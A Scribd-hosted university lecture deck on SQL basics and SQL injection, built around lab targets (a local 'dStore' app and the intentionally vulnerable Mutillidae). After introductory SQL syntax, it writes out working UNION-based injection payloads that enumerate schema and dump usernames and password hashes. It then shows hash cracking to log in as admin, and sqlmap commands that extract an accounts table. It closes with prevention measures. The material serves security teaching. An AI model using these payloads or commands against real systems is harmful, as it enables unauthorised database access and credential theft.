Scribd
Upload
19 views47 pages

Lecture-5 SQLi Detail SWE 4503

The document provides an overview of SQL (Structured Query Language), its capabilities, and various SQL statements, including SELECT, WHERE, ORDER BY, and UNION. It also discusses SQL injection types, exploitation techniques, and prevention methods, emphasizing the importance of input validation and prepared statements. Additionally, it introduces SQLMAP, a tool for automating SQL injection detection and exploitation.

Uploaded by

tasfiatahsin
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
19 views47 pages

Lecture-5 SQLi Detail SWE 4503

The document provides an overview of SQL (Structured Query Language), its capabilities, and various SQL statements, including SELECT, WHERE, ORDER BY, and UNION. It also discusses SQL injection types, exploitation techniques, and prevention methods, emphasizing the importance of input validation and prepared statements. Additionally, it introduces SQLMAP, a tool for automating SQL injection detection and exploitation.

Uploaded by

tasfiatahsin
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 47

SQL INJECTION

What is SQL?
• SQL stands for Structured Query Language
• SQL is a standard language for accessing and manipulating databases

What Can SQL do?


• SQL can execute queries against a database
• SQL can retrieve data from a database
• SQL can insert, update, delete records in a database

Source: Reference [2]


Credit: w3schools.com
SQL INJECTION
Database
• A database most often contains one or more tables
• Each table is identified by a name (e.g. "Customers" or "Orders")
• Tables contain records (rows) with data

Credit: w3schools.com
SQL INJECTION
SQL Syntax
• Most of the actions perform on a database are done with SQL statements
• The following SQL statement selects all the records in the “customers" table:
SELECT * FROM customers;

Keep in Mind That...


• SQL keywords are NOT case sensitive: select is the same as SELECT

Semicolon after SQL Statements?


• Some database systems require a semicolon at the end of each SQL statement
• Semicolon is the standard way to separate each SQL statement in database systems
that allow more than one SQL statement to be executed in the same call to the
server.
Credit: w3schools.com
SQL INJECTION
SQL SELECT Statement Syntax

• Method1
SELECT * FROM table_name;

• Method2
SELECT column1, column2, ...
FROM table_name;

Credit: w3schools.com
SQL INJECTION
SQL SELECT Statement Syntax
• Demo Database: northwind

SELECT Column Example


• The following SQL statement selects the "ContactName" and "City" columns from
the “customers" table:
SELECT ContactName, City FROM customers;

Credit: w3schools.com
SQL INJECTION
SELECT * Example
• The following SQL statement selects all the columns from the “customers" table:
SELECT * FROM customers;

Credit: w3schools.com
SQL INJECTION
The SQL WHERE Clause
• The WHERE clause is used to filter records.
• It is used to extract only those records that fulfill a specified condition.

WHERE Syntax
SELECT column1, column2, ...
FROM table_name
WHERE condition;

Credit: w3schools.com
SQL INJECTION
WHERE Clause Example
• The following SQL statement selects all the customers from the country "Mexico",
in the “customers" table.

SELECT * FROM customers


WHERE Country='Mexico';

Credit: w3schools.com
SQL INJECTION
SQL ORDER BY Keyword
• The ORDER BY keyword is used to sort the result-set in ascending or descending
order.
• The ORDER BY keyword sorts the records in ascending order by default. To sort the
records in descending order, use the DESC keyword.

SELECT column1, column2, ...


FROM table_name
ORDER BY column1, column2, ... ASC|DESC;

Credit: w3schools.com
SQL INJECTION
ORDER BY Example
• The following SQL statement selects all customers from the “customers" table,
sorted by the "Country" column:
SELECT * FROM customers
ORDER BY Country;

Credit: w3schools.com
SQL INJECTION
ORDER BY DESC Example
• The following SQL statement selects all customers from the “customers" table,
sorted DESCENDING by the "Country" column:

SELECT * FROM customers


ORDER BY Country DESC;

Credit: w3schools.com
SQL INJECTION
ORDER BY Several Columns Example
• The following SQL statement selects all customers from the “customers" table,
sorted by the "Country" and the "ContactName" column. This means that it orders
by Country, but if some rows have the same Country, it orders them by
ContactName:
SELECT * FROM customers
ORDER BY Country, ContactName;

Credit: w3schools.com
SQL INJECTION
SQL UNION Operator
• The UNION operator is used to combine the result-set of two or more SELECT
statements.

• Every SELECT statement within UNION must have the same number of columns
• The columns must also have similar data types
• The columns in every SELECT statement must also be in the same order

Credit: w3schools.com
SQL INJECTION
UNION Syntax
SELECT column_name(s) FROM table1
UNION
SELECT column_name(s) FROM table2;
UNION Example
• The following SQL statement returns the cities (only distinct values)
from both the "customers" and the "suppliers" table.

SELECT City FROM customers


UNION
SELECT City FROM suppliers
ORDER BY City;

Credit: w3schools.com
SQL INJECTION
UNION ALL Syntax
SELECT column_name(s) FROM table1
UNION ALL
SELECT column_name(s) FROM table2;
UNION ALL Example
• The following SQL statement returns the cities (duplicate values also)
from both the "customers" and the "suppliers" table:

SELECT City FROM customers


UNION ALL
SELECT City FROM suppliers
ORDER BY City;

Credit: w3schools.com
SQL INJECTION
SQL Comments
• Comments are used to explain sections of SQL statements, or to prevent execution
of SQL statements.

Single Line Comments


• Single line comments start with --
• Any text between -- and the end of the line will be ignored (will not be executed).

Examples
SELECT * FROM customers -- WHERE City='Berlin';

Credit: w3schools.com
SQL INJECTION
Multi-line Comments
• Multi-line comments start with /* and end with */
• Any text between /* and */ will be ignored

Examples
/*select all the columns
of all the records
in the customers table:*/
SELECT * FROM customers;

Credit: w3schools.com
SQL INJECTION
Types of SQL Injection
• Error-Based SQLi
• Boolean-Based SQLi
• Time-Based SQLi
• Out-of-band SQLi
SQL INJECTION
Error Based SQL Injection: Manual Exploitation

URL: http://localhost/dStore/login.php
SQL INJECTION
Error Based SQL Injection: Detection

User ID: user1'


SQL INJECTION
Error Based SQL Injection: Identify Column Number

User ID: user1' order by 10 #


SQL INJECTION
Error Based SQL Injection: Identify Column Number
User ID: user1' order by 5 #
SQL INJECTION
Error Based SQL Injection: Identify Vulnerable Column
User ID: user1' union all select 1,2,3,4,5 #
SQL INJECTION
Error Based SQL Injection: Identify Vulnerable Column

Full Query after UNION:


SELECT id, uname, upass, utype, last_update from user WHERE uname='user1' UNION
ALL SELECT 1,2,3,4,5 #;
SQL INJECTION
Error Based SQL Injection: Identify Vulnerable Column

User ID: user1' union all select 1,version(),3,4,5 #


SQL INJECTION
Error Based SQL Injection: Identify Vulnerable Column
User ID: user1' union all select 1,database(),3,4,5 #
SQL INJECTION
Error Based SQL Injection: Identify Vulnerable Column
User ID: user1' union all select 1,user(),3,4,5 #
SQL INJECTION
Error Based SQL Injection: Identify Table Name

• The Information_schema is a database that stores information about other


databases.

Database: information_schema
SQL INJECTION
Error Based SQL Injection: Identify Table Name

User ID: user1' union all select 1,group_concat(table_name),3,4,5 from


information_schema.tables where table_schema=database() #

• The group_concat() function concatenates results into a string.


SQL INJECTION
Error Based SQL Injection: Identify Column Name
Database: information_schema
SQL INJECTION
Error Based SQL Injection: Identify Column Name
User ID: user1' union all select
1,group_concat(0x3C,0x62,0x72,0x3E,column_name),3,4,5
from information_schema.columns where table_name='user'
and table_schema=database() limit 0,25 #

• The group_concat() function concatenates results into a string.


• 0x3C,0x62,0x72,0x3E represents <br> which means line break.
SQL INJECTION
Error Based SQL Injection: Extract Data

User ID: user1' union all select 1, group_concat(0x3C,0x62,0x72,0x3E, uname, 0x0a,


upass), 3, 4, 5 from estore.user limit 0,25 #
SQL INJECTION
Error Based SQL Injection: Decrypt Hash
• Decrypt Hash to obtain plaintext password

URL: https://crackstation.net/ Login as admin user:


SQL INJECTION
Error Based SQL Injection: Automated Exploitation

SQLMAP
• SQLMAP is an open source penetration testing tool that automates the process of
detecting and exploiting SQL injection flaws and taking over of database servers.
• URL: https://sqlmap.org
SQL INJECTION
Error Based SQL Injection
SQLMAP Syntax

sqlmap -u <Target URL (e.g. "http://www.site.com/vuln.php?id=1")>


--method <POST/GET>
--data <Data string to be sent through POST (e.g. “username=user1&pass=123")>
--cookie <HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")>
-p <Testable parameter (e.g. “username”)>
--threads=10 -v3 --level=5 --risk=3
--dbms=<Database App Name (e.g. MySQL or Oracle)>
--technique=<SQL injection techniques to use (default "BEUSTQ")>
--current-user
SQL INJECTION
Error Based SQL Injection: Gather information
• Firefox Extension: HTTP Live Header

URL: http://localhost/mutillidae
Go to “OWASP 2017” > “A1 – Injection (SQL)” > “SQLi -Bypass Authentication” > “Login”

Username: user1
Password: 123
SQL INJECTION
Error Based SQL Injection: Gather information
• Firefox Extension: HTTP Live Header
SQL INJECTION
Error Based SQL Injection: Get Current User

sqlmap -u "http://192.168.59.134/mutillidae/index.php?page=login.php"
--method POST
--data "username=user1&password=123&login-php-submit-button=Login"
--cookie="showhints=1; PHPSESSID=66t8phka13l345nb46qlpn9jpl"
-p username
--threads=10 -v3 --level=5 --risk=3
--dbms=MySQL
--technique=EU
--current-user
SQL INJECTION
Error Based SQL Injection: Get Current User
SQL INJECTION
Error Based SQL Injection: Get Current DB
--current-db
SQL INJECTION
Error Based SQL Injection: Get All DB
--dbs
SQL INJECTION
Error Based SQL Injection: Get DB Tables
-D mutillidae --tables
SQL INJECTION
Error Based SQL Injection: Get Table Columns
-D mutillidae -T accounts --columns
SQL INJECTION
Error Based SQL Injection: Extract Data
-D mutillidae -T accounts -C cid,username,password --dump
SQL INJECTION
Impact
• Add, delete, edit or read content in the database
• Read source code from files on the database server
• Write files to the database server
SQL INJECTION
Prevent SQL Injection
• Input validation
• Use of Prepared Statements (with Parameterized Queries)
• Escaping All User-Supplied Input
• Train and maintain awareness
Reference
1. Lecture by Mohammad Ariful Islam, Information Security Specialist, BGD e-GOV CIRT, Bangladesh Computer Council, A Short Course
on Cyber Security for Information Age: Practices and Challenges, Organized by Department of CSE, IUT.

You might also like